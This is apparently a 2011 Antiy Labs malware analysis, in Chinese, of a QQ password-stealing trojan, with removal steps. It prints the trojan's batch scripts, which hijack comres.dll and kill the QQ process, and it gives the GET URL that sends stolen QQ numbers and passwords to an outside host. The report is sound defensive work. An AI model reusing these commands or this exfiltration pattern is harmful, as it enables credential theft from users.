Trojan/Win32.QQpass.wsy[stealer]分析

Trojan/Win32.QQpass.wsy[stealer]分析 出处：安天实验室 时间：2011年8月22日   病毒标签   病毒名称：Trojan/Win32.QQpass.wsy[stealer] 病毒类型：盗号木马 文件 MD5：119F88734602DF573780149C3DB4204A 公开范围： 完全公开 危害等级： 3 文件长度： 290,837 字节 感染系统： Windows 98以上版本 开发工具： Microsoft Visual C++ 5.0 加壳类型： 无 病毒描述       该病毒是一个盗号木马，图标伪装为画笔文件图标。运行后结束QQ进程，迫使用户重新登录QQ，从而达到窃取密码的目的。恶意程序创建一个文本框覆盖在QQ原输入框之上来获取QQ密码，并通过Hook腾讯QQ的窗口消息来对假冒文本框进行定位。将盗取的QQ账号与密码以Get方式发送到指定地址。 行为分析-本地行为   1.恶意程序运行后衍生以下文件： %QQ%\Bin\comres.dll （用作镜像劫持替代系统的comres.dll） %QQ%\Bin\JoachimPeiper.dat （数据文件） %windows%\JoachimPeiper.dat （对文件%QQ%\Bin\JoachimPeiper.dat的备份） %windows%\rxing.bat （对文件% QQ%\Bin\comres.dll的备份） %windows%\mssoft.bat （用于结束QQ进程的批处理文件） %HomeDrive%\nod816.bat （文件路径布置批处理文件） %HomeDrive%\stter.exe （主要功能文件，PE可执行文件） 2.%HomeDrive%\nod816.bat文件内容及功能。 Move %QQ%\bin\shengod.dat %QQ%\bin\comres.dll move d:\fdsf.bmp d:\fdsf.bmp move d:\fdsf.bmp d:\fdsf.bmp del %system32%\dllcache\comres.dll move %system32%\comres.dll %WINDOWS%\hexil.dll move %WINDOWS%\rxing.bat %system32%\comres.dll copy %WINDOWS%\hexil.dll %QQ%\bin\hexil.dll copy %WINDOWS%\hexil.dll d:\fdsf.bmp copy %WINDOWS%\hexil.dll d:\fdsf.bmp del %0 功能：主要是进行了文件路径的布置。 3.%windows%\mssoft.bat文件内容及功能。 taskkill /f /im qq.exe /t 功能：结束QQ进程。 4.恶意程序的进程操作 创建IE进程并将恶意代码写入其中,监听本机UDP:1488端口,IE进程通过以下参数创建。 "%Program Files%\Internet Explorer\iexplore.exe" SCODEF:3208 CREDAT:14337 5.恶意程序的盗取方式 将%HomeDrive%\stter.exe文件注入到QQ进程中执行，并创建钩子来监控QQ登录窗口。如果发现，则创建一个文本框覆盖在QQ原输入框之上，用以截获用户输入的用户名密码。然后尝试解析域名为www.xxx.com的主机地址，并将获得的用户名密码以GET方式发送到指定的地址。 行为分析-网络行为   协议:HTTP 端口:80 连接域名: www.xxx.com 描述：通过GET方式进行提交. http://www.xxx.com/qq080910/mail.asp?tomail=xxx@163.com&mailbody=%s----%s&QQNumber=%s&QQPassWord=%s 注：以上连接中的%s为恶意程序盗取的QQ用户名及密码的字符串形式。 注：%System32%是一个可变路径。病毒通过查询操作系统来决定当前System文件夹的位置。Windows2000/NT中默认的安装路径是C:\Winnt\System32，windows95/98/me中默认的安装路径是C:\Windows\System，windowsXP中默认的安装路径是C:\Windows\System32。 %Temp% = C:\Documents and Settings\AAAAA\Local Settings\Temp 当前用户TEMP缓存变量 %Windir%\ WINDODWS所在目录 %DriveLetter%\ 逻辑驱动器根目录 %ProgramFiles%\ 系统程序默认安装目录 %HomeDrive% = C:\ 当前启动的系统的所在分区 %Documents and Settings%\ 当前用户文档根目录 清除方案   1、使用安天防线可彻底清除此病毒(推荐)，请点击下载(http://www.antiyfx.com)。 2、手工清除请按照行为分析删除对应文件，恢复相关系统设置。 推荐使用ATool管理工具，请点击下载(http://www.antiyfx.com/download/atool.zip)。 (1)结束QQ.exe进程。 (2)删除恶意程序衍生文件。 %QQ%\Bin\comres.dll %QQ%\Bin\JoachimPeiper.dat %windows%\JoachimPeiper.dat %windows%\rxing.bat %windows%\mssoft.bat %HomeDrive%\nod816.bat %HomeDrive%\stter.exe (3)下载原始comres.dll文件拷贝到以下目录，用以替换病毒文件： %system32%\dllcache\comres.dll (4)重新启动计算机。

转自安天实验室: http://www.antiy.com/cn/security/2011/r110822_001.htm